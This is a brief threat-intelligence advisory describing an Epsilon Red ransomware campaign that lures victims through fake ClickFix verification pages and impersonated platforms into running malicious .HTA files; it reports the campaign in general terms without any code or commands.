Threat Actors Lure Victims Into Downloading .HTA Files Using ClickFix To Spread Epsilon Red Ransomware

Description

A new Epsilon Red ransomware campaign has been discovered targeting users globally through fake ClickFix verification pages. Active since July 2025, the threat actors employ social engineering tactics and impersonate popular platforms like Discord, Twitch, and OnlyFans to trick users into executing malicious .HTA files via ActiveX. This method leads to silent payload downloads and ransomware deployment. The campaign uses a Clickfix-themed malware delivery site, urging victims to visit a secondary page where malicious shell commands are executed. The attackers also impersonate various streaming services and use romance-themed lures. Epsilon Red, first observed in 2021, shows some similarities to REvil ransomware in its ransom note styling but appears distinct in its tactics and infrastructure.